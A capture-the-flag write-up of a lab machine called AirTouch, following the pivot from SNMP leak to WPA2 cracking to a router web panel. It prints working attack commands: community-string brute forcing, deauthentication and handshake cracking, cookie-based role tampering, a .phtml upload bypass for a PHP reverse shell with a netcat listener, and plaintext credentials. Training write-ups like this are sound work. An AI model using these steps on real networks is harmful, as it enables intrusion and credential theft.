pwndbg> info breakpoints

1 RECON

1.1 Port Scan

Bash
rustscan -a $targetIp --ulimit 1000 -r 1-65535 -- -A -sC -Pn

Only port 22 is open. So we pivot to UDP and scan with udpx:

Bash
udpx -t $targetIp -c 128 -w 1001

That immediately reveals SNMP:

axura @ labyrinth :~ 
$ udpx -t $targetIp -c 128 -w 1000

    __ ______ ____ _   __
   / / / / __ \/ __ \|/ /
  / / / / / / / /_/ /  / 
 / /_/ / /_/ / ____/  | 
 \____/_____/_/  /_/|_| 
 v1.0.7, by @nullt3r

2026/01/17 18:47:40 [+] Starting UDP scan on 1 target(s)
2026/01/17 18:47:52 [*] 10.129.11.56:161 (snmp)
2026/01/17 18:48:12 [+] Scan completed

Port 161 is open for SNMP.

2 WEB

2.1 SNMP

2.1.1 SNMP 101

SNMP (Simple Network Management Protocol) is used to monitor and manage devices like servers, switches, routers, and printers.

Versions:

  • SNMPv1 / v2c: uses community strings (basically a password)
  • SNMPv3: uses real auth + encryption

Community string:

  • "public" = default read-only
  • "private" = default read-write
  • custom strings

OIDs (Object IDs):

  • SNMP data is stored like a tree. Each node has an ID, like:
  • 1.3.6.1.2.1.1 = system info (sysDescr, sysName, etc.)

2.1.2 SNMP Exploitation

We can traverse the SNMP tree with snmpwalk, but first we need the community string.

Bruteforce it with onesixtyone:

Bash
onesixtyone -i <(echo $targetIp) -c $wordlist

Result:

axura @ labyrinth :~ 
$ export strings=/home/Axura/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings-o
nesixtyone.txt

$ onesixtyone -i <(echo $targetIp) -c $strings
Scanning 1 hosts, 120 communities
10.129.11.56 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it aft
er use it)"
10.129.11.56 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it aft
er use it)"

From the onesixtyone output:

  • Community: public
  • Consultant password: RxBlZhLmOkacNWScmZ6D

Now we just need the missing piece: the username.

Since SNMP literally leaks "consultant password", the account is very likely named consultant (or something close like svc-consultant).

Try the obvious SSH login:

axura @ labyrinth :~ 
$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sun Jan 18 07:15:31 2026 from 10.10.14.27
consultant@AirTouch-Consultant:~$ id
uid=1000(consultant) gid=1000(consultant) groups=1000(consultant)
consultant@AirTouch-Consultant:~$ hostname
AirTouch-Consultant

SNMP leak → default credential reuse → SSH as consultant. Foothold acquired.

2.2 VLAN Wifi Pivoting

"AirTouch" pretty much screams WiFi appliance / AP controller / captive portal energy.

2.2.1 Internal Network

2.2.1.1 Enumeration

First, inspect the interfaces:

axura @ labyrinth :~ 
consultant@AirTouch-Consultant:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 22:9b:1c:c2:a4:cb brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
       valid_lft forever preferred_lft forever
7: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff

This is the key line:

ShellSession
2: eth0@if29: <...> state UP
    inet 172.20.1.2/24

eth0@if29 means eth0 is one end of a veth pair, linked to interface index 29 on the host side. That's classic container-style networking (bridge / virtual switch), likely sitting behind something like a docker0-type setup.

And then we have:

ShellSession
wlan0 ... state DOWN ... 02:00:00:00:00:00
wlan1 ... state DOWN ... 02:00:00:00:01:00
...
wlan6 ... state DOWN ... 02:00:00:00:06:00

These are virtual WiFi interfaces. The MACs are clean, synthetic, and deterministic — not real hardware.

Right now they're down, meaning nothing is driving them yet:

  • no active WiFi simulation
  • no AP/controller process pulling them up

But the takeaway is obvious:

This box is built to run WiFi tooling and services locally.

2.2.1.2 Topology

There are two interesting diagrams sitting in the consultant's home directory. Pull them down:

axura @ labyrinth :~ 
consultant@AirTouch-Consultant:~$ ls -a
.   .bash_history  .bashrc  .profile         photo_2023-03-01_22-04-52.png
..  .bash_logout   .cache   diagram-net.png

consultant@AirTouch-Consultant:~$ logout
Connection to airtouch.htb closed.

$ scp [email protected]:/home/consultant/diagram-net.png .
[email protected]'s password:
diagram-net.png                                             100%  129KB  11.7KB/s   00:10

$ scp [email protected]:/home/consultant/photo_2023-03-01_22-04-52.png .
[email protected]'s password:
photo_2023-03-01_22-04-52.png                               100%  726KB  19.7KB/s   00:36

$ ls
diagram-net.png     photo_2023-03-01_22-04-52.png

From diagram-net.png, we get the full picture: three isolated VLANs / networks sitting behind a NAT router.

NAT Router (blue)

At the top:

  • :22 -> 172.20.1.2:22
  • :161 -> 172.20.1.2:161

Only two ports (SSH 22 & SNMP 161) are NAT-forwarded externally, which matches our observation.

VLAN A — Consultant VLAN (yellow)

The consultant laptop is 172.20.1.2/24, which matches our current foothold on AirTouch-Consultant.

VLAN B — Tablets VLAN (red)
  • SSID: AirTouch-Internet
  • "Tablet manager" = 192.168.3.0/24

This looks like an internal management segment, likely hosting something only reachable from inside.

VLAN C — Corp VLAN (green)
  • SSID: AirTouch-Office
  • Corporate computer = 10.10.10.0/24

This is the real prize: the internal corporate VLAN, and most likely the final destination.

2.2.2 Goals

photo_2023-03-01_22-04-52.png (the hand sketch) tells the same story:

  • Consultant VLAN (switch + laptops)
  • Tablets VLAN (AP "AirTouch-Internet")
  • Corp VLAN (AP "AirTouch-Office")
  • NAT connecting them

Our objective is to:

  1. foothold on Consultant VLAN (done)
  2. pivot into Tablets VLAN (192.168.3.0/24)
  3. pivot into Corp VLAN (10.10.10.0/24)
  4. steal flags / root

Now the real question is:

How can we reach 192.168.3.0/24 and/or 10.10.10.0/24 from current foothold (172.20.1.2/24)?

2.2.3 Sudo

Even though we don't have direct access to the WLANs yet, we do have something better: full sudo on the box. So jump straight to root on AirTouch-Consultant by simply running sudo su:

axura @ labyrinth :~ 
consultant@AirTouch-Consultant:~$ ip -br a
lo               UNKNOWN        127.0.0.1/8 ::1/128
eth0@if29        UP             172.20.1.2/24
wlan0            DOWN
wlan1            DOWN
wlan2            DOWN
wlan3            DOWN
wlan4            DOWN
wlan5            DOWN
wlan6            DOWN

consultant@AirTouch-Consultant:~$ sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL
    
consultant@AirTouch-Consultant:~$ sudo su

root@AirTouch-Consultant:/home/consultant# id
uid=0(root) gid=0(root) groups=0(root)

2.2.4 Sniffing

At this point we have everything we need:

  • root on AirTouch-Consultant
  • multiple simulated WiFi radios (wlan0..wlan6)

So we can treat this box as our wireless attacker, connect to AirTouch-Internet (Tablets VLAN), and pivot deeper.

Bring up one interface (start with wlan0) and scan for nearby SSIDs:

Bash
ip link set wlan0 up
iw dev wlan0 scan | egrep "SSID:|BSS |signal:|freq:"

Result:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/home/consultant# ip link set wlan0 up
root@AirTouch-Consultant:/home/consultant# iw dev wlan0 scan | egrep "SSID:|BSS |signal:|freq:"
BSS 5e:58:90:a3:f2:9f(on wlan0)
        freq: 2412
        signal: -30.00 dBm
        SSID: vodafoneFB6N
BSS 1a:38:bb:6e:58:ae(on wlan0)
        freq: 2422
        signal: -30.00 dBm
        SSID: MOVISTAR_FG68
BSS ca:04:fd:9c:c9:c9(on wlan0)
        freq: 2437
        signal: -30.00 dBm
        SSID: WIFI-JOHN
BSS f0:9f:c2:a3:f1:a7(on wlan0)
        freq: 2437
        signal: -30.00 dBm
        SSID: AirTouch-Internet
BSS ae:5e:43:d4:b6:e0(on wlan0)
        freq: 2452
        signal: -30.00 dBm
        SSID: MiFibra-24-D4VY
BSS ac:8b:a9:aa:3f:d2(on wlan0)
        freq: 5220
        signal: -30.00 dBm
        SSID: AirTouch-Office
BSS ac:8b:a9:f3:a1:13(on wlan0)
        freq: 5220
        signal: -30.00 dBm
        SSID: AirTouch-Office

This lines up perfectly with the topology diagram — we can see both internal SSIDs, including two corporate APs.

AirTouch-Internet (Tablet VLAN)

  • SSID: AirTouch-Internet
  • BSSID: f0:9f:c2:a3:f1:a7
  • Freq: 2412 MHz → Channel 1
  • Signal: -30 dBm (strong)

AirTouch-Office (Corp VLAN)

  • BSSID #1: ac:8b:a9:aa:3f:d2
  • BSSID #2: ac:8b:a9:f3:a1:13
  • Freq: 5220 MHz → Channel 44

2.2.5 Pivot

Next move: pivot into the Tablets VLAN first — AirTouch-Internet.

We'll do this in two lanes:

  • Lane A: capture a WPA handshake (monitor mode)
  • Lane B: connect to the SSID (managed mode)

Phase 1 — Capture

Bash
# Put wlan0 into monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# verify
iw dev wlan0 info

wlan0 is now manually turned into monitor mode from previous managed mode through locked to channel 1:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/home/consultant# iw dev wlan0 info
Interface wlan0
        ifindex 7
        wdev 0x1
        addr 02:00:00:00:00:00
        type monitor
        wiphy 0
        channel 1 (2412 MHz), width: 20 MHz (no HT), center1: 2412 MHz
        txpower 20.00 dBm

Now scan the air:

Bash
airodump-ng wlan1

Result:

axura @ labyrinth :~ 
 CH 13 ][ Elapsed: 2 mins ][ 2026-01-18 09:44 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:A3:F1:A7  -28       84       10    0   6   54        CCMP   PSK  AirTouch-Internet 
 CA:04:FD:9C:C9:C9  -28       84        0    0   6   54        CCMP   PSK  WIFI-JOHN         
 AE:5E:43:D4:B6:E0  -28       83        0    0   9   54   WPA2 CCMP   PSK  MiFibra-24-D4VY   
 1A:38:BB:6E:58:AE  -28      167        0    0   3   54        CCMP   PSK  MOVISTAR_FG68     
 5E:58:90:A3:F2:9F  -28     1175        0    0   1   54        TKIP   PSK  vodafoneFB6N      

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   12 - 9      0       10
 (not associated)   28:6C:07:12:EE:F3  -29    0 - 1      0        4         AirTouch-Office
 (not associated)   C8:8A:9A:6F:F9:D2  -29    0 - 1      0        9         AccessLink,AirTouc
 (not associated)   28:6C:07:12:EE:A1  -29    0 - 1      0        6         AirTouch-Office

wlan1 can see AirTouch-Internet and the surrounding APs, so we can use it as our sniffer/injector.

Note: airodump-ng is channel-hopping (CH 13 in the header). We can lock it using -c.

Right now the capture shows no STATION associated to AirTouch-Internet, meaning no client is talking. So deauth may do nothing unless someone reconnects.

From the table in 2.2.4, AirTouch-Internet is:

  • BSSID: F0:9F:C2:A3:F1:A7
  • Channel: 6

Lock the capture and write to disk:

Bash
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 -w /tmp/inet wlan0

Leave it running until we see a client:

axura @ labyrinth :~ 
 CH  6 ][ Elapsed: 1 min ][ 2026-01-18 09:52 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 F0:9F:C2:A3:F1:A7  -28 100      755       31    0   6   54        CCMP   PSK  AirTouch-Inter

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29    1 -18      0       33         AirTouch-Internet

Phase 2 — Handshake

In a second terminal, force a reconnect:

Bash
# Deauth using the same interface name (wlan0)
sudo su
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0

Phase 3 - Crack

Stop the capture (Ctrl+C) and check the output files:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/home/consultant# ls /tmp
inet-01.cap            inet-01.log.csv     inet-02.kismet.netxml  inet-03.kismet.csv
inet-01.csv            inet-02.cap         inet-02.log.csv        inet-03.kismet.netxml
inet-01.kismet.csv     inet-02.csv         inet-03.cap            inet-03.log.csv
inet-01.kismet.netxml  inet-02.kismet.csv  inet-03.csv

root@AirTouch-Consultant:/home/consultant# aircrack-ng /tmp/inet-01.cap | head -n 30
Reading packets, please wait...
Opening /tmp/inet-01.cap
Read 0 packets.
No networks found, exiting.
Quitting aircrack-ng...

root@AirTouch-Consultant:/home/consultant# for f in /tmp/inet-0*.cap; do
>   echo "==== $f ===="
>   ls -lh "$f"
>   wc -c "$f"
> done
==== /tmp/inet-01.cap ====
-rw-r--r-- 1 root root 24 Jan 18 09:25 /tmp/inet-01.cap
24 /tmp/inet-01.cap
==== /tmp/inet-02.cap ====
-rw-r--r-- 1 root root 24 Jan 18 09:34 /tmp/inet-02.cap
24 /tmp/inet-02.cap
==== /tmp/inet-03.cap ====
-rw-r--r-- 1 root root 262K Jan 18 10:01 /tmp/inet-03.cap
267644 /tmp/inet-03.cap

We immediately see the difference:

  • inet-01.cap = 24 bytes → empty placeholder (airodump created file, captured nothing)
  • inet-02.cap = 24 bytes → same
  • inet-03.cap = 262 KBREAL capture (packets exist)

Inspect the real capture, run:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/home/consultant# aircrack-ng /tmp/inet-03.cap | head -n 40
Reading packets, please wait...
Opening /tmp/inet-03.cap
Read 5440 packets.

## BSSID ESSID Encryption

   1  F0:9F:C2:A3:F1:A7  AirTouch-Internet         WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening /tmp/inet-03.cap
Read 5440 packets.

1 potential targets

Please specify a dictionary (option -w).

Perfect:

  • ESSID: AirTouch-Internet
  • WPA (1 handshake)
  • 5440 packets

Pull the capture to our attack box:

Bash
scp [email protected]:/tmp/inet-03.cap .

Then crack locally:

Bash
aircrack-ng -w /home/Axura/wordlists/rockyou.txt ./inet-03.cap

Key found:

axura @ labyrinth :~ 
                               Aircrack-ng 1.7

      [00:00:01] 27019/10303727 keys tested (20284.95 k/s)

      Time left: 8 minutes, 26 seconds                           0.26%

                           KEY FOUND! [ challenge ]


      Master Key     : D1 FF 70 2D CB 11 82 EE C9 E1 89 E1 69 35 55 A0
                       07 DC 1B 21 BE 35 8E 02 B8 75 74 49 7D CF 01 7E

      Transient Key  : D3 63 DE 84 F1 31 F2 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : EE CF A7 E8 F1 CA 1E CF 5B 53 47 3E 8E 71 E8 66

PSK: challenge for AirTouch-Internet.

Phase 4 - Connect

Use a different interface (keep wlan0 for monitor or change it to managed, nvm). I'll use wlan3.

Bash
cat > /tmp/inet.conf << 'EOF'
network={
    ssid="AirTouch-Internet"
    psk="challenge"
    scan_ssid=1
    key_mgmt=WPA-PSK
}
EOF

Connect and grab DHCP:

Bash
# run as root
ip link set wlan3 up
wpa_supplicant -B -D nl80211 -i wlan3 -c /tmp/inet.conf
dhclient -v wlan3

Result:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/home/consultant# cat > /tmp/inet.conf << 'EOF'
> network={
>     ssid="AirTouch-Internet"
>     psk="challenge"
>     scan_ssid=1
>     key_mgmt=WPA-PSK
> }
> EOF

root@AirTouch-Consultant:/home/consultant# ip link set wlan3 up

root@AirTouch-Consultant:/home/consultant# wpa_supplicant -B -D nl80211 -i wlan3 -c /tmp/inet.
conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information

root@AirTouch-Consultant:/home/consultant# dhclient -v wlan3
[… snip …]
Listening on LPF/wlan3/02:00:00:00:03:00
Sending on   LPF/wlan3/02:00:00:00:03:00
Sending on   Socket/fallback
DHCPDISCOVER on wlan3 to 255.255.255.255 port 67 interval 3 (xid=0x27986317)
DHCPDISCOVER on wlan3 to 255.255.255.255 port 67 interval 4 (xid=0x27986317)
DHCPOFFER of 192.168.3.46 from 192.168.3.1
DHCPREQUEST for 192.168.3.46 on wlan3 to 255.255.255.255 port 67 (xid=0x17639827)
DHCPACK of 192.168.3.46 from 192.168.3.1 (xid=0x27986317)
bound to 192.168.3.46 -- renewal in 38069 seconds.

root@AirTouch-Consultant:/home/consultant# ip a
[… snip …]
10: wlan3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 100
0
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.46/24 brd 192.168.3.255 scope global dynamic wlan3
       valid_lft 86397sec preferred_lft 86397sec
[… snip …]

wlan3 pulls a lease from the Tablets VLAN:

  • wlan3 IP: 192.168.3.46/24
  • DHCP / gateway: 192.168.3.1

We're officially inside AirTouch-Internet — the "Tablet manager" segment from the diagram.

Phase 5 - Pivot Scan

Upload a static nmap binary and scan the subnet:

axura @ labyrinth :~ 
$ scp ~/hacktools/linux/static_binary/nmap [email protected]:/tmp/
[email protected]'s password:
nmap                                                        100% 5805KB 384.1KB/s   00:15

$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sun Jan 18 10:38:39 2026 from 10.10.14.27

consultant@AirTouch-Consultant:~$ chmod +x /tmp/nmap

consultant@AirTouch-Consultant:~$ /tmp/nmap 192.168.3.0/24
Nmap scan report for 192.168.3.1
Host is up (0.00083s latency).
Not shown: 1179 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

Nmap scan report for 192.168.3.46
Host is up (0.00089s latency).
Not shown: 1181 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (2 hosts up) scanned in 10.62 seconds

The Tablets VLAN is tiny by design:

  • 192.168.3.1 = Tablet Manager / gateway
    • Open: 22/SSH, 53/DNS, 80/HTTP
  • 192.168.3.46 = us (wlan3 client)

So the next pivot is 100% through 192.168.3.1:80.

3 USER

3.1 PHP Web App

3.1.1 Port Forward

Forward 192.168.3.1:80 to our local machine:

Bash
# bind to localhost:8888
ssh -L 8888:192.168.3.1:80 [email protected]

Quick fingerprint — simple PHPSESSID used for cookie:

axura @ labyrinth :~ 
$ whatweb http://127.0.0.1:8888
http://127.0.0.1:8888 [302 Found] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ],
HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[127.0.0.1], RedirectLocation[login.php]
http://127.0.0.1:8888/login.php [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED
][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[127.0.0.1], PasswordField[
Password], Title[WiFi Router Configuration]

A PHP login panel pops up — the PSK router's web UI.

3.1.2 WPA2 Traffic Decryption

Since we already cracked the PSK for AirTouch-Internet, we can instruct Wireshark to decrypt WPA2 traffic.

Navigate to: Edit → Preferences → Protocols → IEEE 802.11 → Decryption Keys

Add the key in this format:

WEP and EPA Decryption Keys
wpa-pwd : challenge:AirTouch-Internet

After decryption, we can directly inspect web traffic between a real client and the router web panel at 192.168.3.1.

Now we can read the HTTP traffic between real clients and the router web panel at 192.168.3.1. To hunt session cookies, use the display filter http.cookie:

That reveals requests like:

HTTP
GET /lab.php HTTP/1.1
Host: 192.168.3.1
User-Agent: curl/7.88.1
Accept: */*
Cookie: PHPSESSID=cj3hbdogkk82ksifpbkbiauudr; UserRole=user

Response:

HTML
<!DOCTYPE html>
<html>

<head>
    <title>WiFi Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>

Welcome manager<br><br><br><br>
Congratulation! You have logged into password protected page. <a href="index.php">Click here</a> to go to index.php to get the flag. 

</body>

</html>

Drop that cookie into our browser and access /lab.php (grab a fresh .cap if it expires):

Login confirmed as manager (user role).

3.1.3 PHP Web Shell

If we flip UserRole=userUserRole=admin, the app unlocks file uploads:

But the filter blocks obvious payloads:

Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.

So this turns into a classic upload-bypass game.

Using the .phtml extension works cleanly here (see PayloadsAllTheThings/Upload Insecure Files/README.md at master · swisskyrepo/PayloadsAllTheThings)

Drop a PHP reverse shell (e.g., ivan php-rever-shell), but set the callback IP to 192.168.3.46 (our Tablets VLAN client). Trigger it via /uploads/rev.phtml.

Shell lands as www-data:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/tmp# chmod +x busybox

root@AirTouch-Consultant:/tmp# ./busybox nc -lnvp 443
listening on [::]:443 ...
connect to [::ffff:192.168.3.46]:443 from [::ffff:192.168.3.1]:57038 ([::ffff:192.168.3.1]:570
SOCKET: Shell has connected! PID: 79709

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

script -c bash 2>/dev/null
Script started, file is typescript

www-data@AirTouch-AP-PSK:/var/www/html/uploads$ pwd
/var/www/html/uploads

From /var/www/html/login.php, we recover hardcoded credentials:

PHP
if (isset($_POST['Submit'])) {
  /* Define username, associated password, and user attribute array */
  $logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );

Two plaintext passwords drop out:

  • User user: JunDRDZKHDnpkpDDvay
  • User manager: 2wLFYNh4TSTgA5sNgT4 (for the web app)

And user works for SSH on the tablet manager host:

axura @ labyrinth :~ 
root@AirTouch-Consultant:/tmp# ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
[…snip…]
user@AirTouch-AP-PSK:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@AirTouch-AP-PSK:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile
user@AirTouch-AP-PSK:~$ ip a
[…snip…]
14: wlan7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 100
0
    link/ether f0:9f:c2:a3:f1:a7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.1/24 scope global wlan7
       valid_lft forever preferred_lft forever
    inet6 fe80::f29f:c2ff:fea3:f1a7/64 scope link
       valid_lft forever preferred_lft forever
15: wlan8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 100
0
    link/ether 16:ec:ba:dc:96:12 brd ff:ff:ff:ff:ff:ff
    inet 192.168.4.1/24 scope global wlan8
       valid_lft forever preferred_lft forever
    inet6 fe80::14ec:baff:fedc:9612/64 scope link
       valid_lft forever preferred_lft forever
16: wlan9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 100
0
    link/ether 4a:14:a7:81:00:6e brd ff:ff:ff:ff:ff:ff
    inet 192.168.5.1/24 scope global wlan9
       valid_lft forever preferred_lft forever
    inet6 fe80::4814:a7ff:fe81:6e/64 scope link
       valid_lft forever preferred_lft forever
17: wlan10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 10
00
    link/ether 66:a4:a1:1e:5e:97 brd ff:ff:ff:ff:ff:ff
    inet 192.168.6.1/24 scope global wlan10
       valid_lft forever preferred_lft forever
    inet6 fe80::64a4:a1ff:fe1e:5e97/64 scope link
       valid_lft forever preferred_lft forever
18: wlan11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 10
00
    link/ether 26:81:7f:5b:3c:cf brd ff:ff:ff:ff:ff:ff
    inet 192.168.7.1/24 scope global wlan11
       valid_lft forever preferred_lft forever
    inet6 fe80::2481:7fff:fe5b:3ccf/64 scope link
       valid_lft forever preferred_lft forever

Now we're on AirTouch-AP-PSK.

From the interface layout, the AP is acting as a multi-VLAN gateway with multiple wireless segments behind it.

3.2 Sudo

user has full NOPASSWD sudo on AirTouch-AP-PSK, so we can jump straight to root:

axura @ labyrinth :~ 
user@AirTouch-AP-PSK:~$ sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on AirTouch-AP-PSK:
    (ALL) NOPASSWD: ALL
user@AirTouch-AP-PSK:~$ sudo su
root@AirTouch-AP-PSK:/home/user# cd
root@AirTouch-AP-PSK:~# ls -la
total 44
drwx------ 1 root root 4096 Jan 18 00:07 .
drwxr-xr-x 1 root root 4096 Jan 18 00:07 ..
lrwxrwxrwx 1 root root    9 Nov 24  2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
drwxr-xr-x 2 root root 4096 Mar 27  2024 certs-backup
-rwxr-xr-x 1 root root    0 Mar 27  2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Jan 18 00:08 psk
-rw-r--r-- 1 root root  364 Nov 24  2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27  2024 start.sh
-rw-r----- 1 root 1001   33 Jan 18 00:07 user.txt
-rw-r--r-- 1 root root  319 Mar 27  2024 wlan_config_aps
root@AirTouch-AP-PSK:~# cat user.txt
be******************************fe

User flag secured.

4 ROOT

4.1 Configs Enumeration

Under root on AirTouch-AP-PSK, we immediately find the AP's core configuration stash:

axura @ labyrinth :~ 
root@AirTouch-AP-PSK:~# ls -l
total 24
drwxr-xr-x 2 root root 4096 Mar 27  2024 certs-backup
-rwxr-xr-x 1 root root    0 Mar 27  2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Jan 18 00:08 psk
-rw-r--r-- 1 root root  364 Nov 24  2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27  2024 start.sh
-rw-r----- 1 root 1001   33 Jan 18 00:07 user.txt
-rw-r--r-- 1 root root  319 Mar 27  2024 wlan_config_aps

root@AirTouch-AP-PSK:~# ls psk
hostapd_other0.conf  hostapd_other2.conf  hostapd_wpa.conf
hostapd_other1.conf  hostapd_other3.conf

root@AirTouch-AP-PSK:~# ls certs-backup/
ca.conf  ca.crt  server.conf  server.crt  server.csr  server.ext  server.key

root@AirTouch-AP-PSK:~# cat wlan_config_aps

# SET WLAN AND IP FOR EVERYTHING

WLAN_PSK=wlan7
IP_PSK='192.168.3'
MAC_PSK='F0:9F:C2:A3:F1:A7'

WLAN_OTHER0=wlan8
IP_OTHER0='192.168.4'
MAC_OTHER0=''

WLAN_OTHER1=wlan9
IP_OTHER1='192.168.5'
MAC_OTHER1=''

WLAN_OTHER2=wlan10
IP_OTHER2='192.168.6'
MAC_OTHER2=''

WLAN_OTHER3=wlan11
IP_OTHER3='192.168.7'
MAC_OTHER3=''

root@AirTouch-AP-PSK:~# cat psk/hostapd_wpa.conf
interface=wlan7
driver=nl80211

hw_mode=g
channel=6
ssid=AirTouch-Internet

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=challenge

ap_isolate=1

Found:

  • certs-backup/ (CA + server cert + private key)
  • psk/hostapd_*.conf (WiFi configs for all SSIDs/VLANs)
  • wlan_config_aps (WLAN ↔ subnet mapping)

WLAN Mapping

wlan_config_aps shows how each WLAN interface maps to a VLAN-style subnet:

  • wlan7192.168.3.0/24 (PSK VLAN)
  • wlan8192.168.4.0/24
  • wlan9192.168.5.0/24
  • wlan10192.168.6.0/24
  • wlan11192.168.7.0/24

AirTouch-Internet (PSK) Confirmation

psk/hostapd_wpa.conf is the config for AirTouch-Internet, and it confirms everything we exploited:

  • WPA2-PSK on wlan7
  • channel 6
  • password = challenge
  • ap_isolate=1 (clients can't talk to each other)

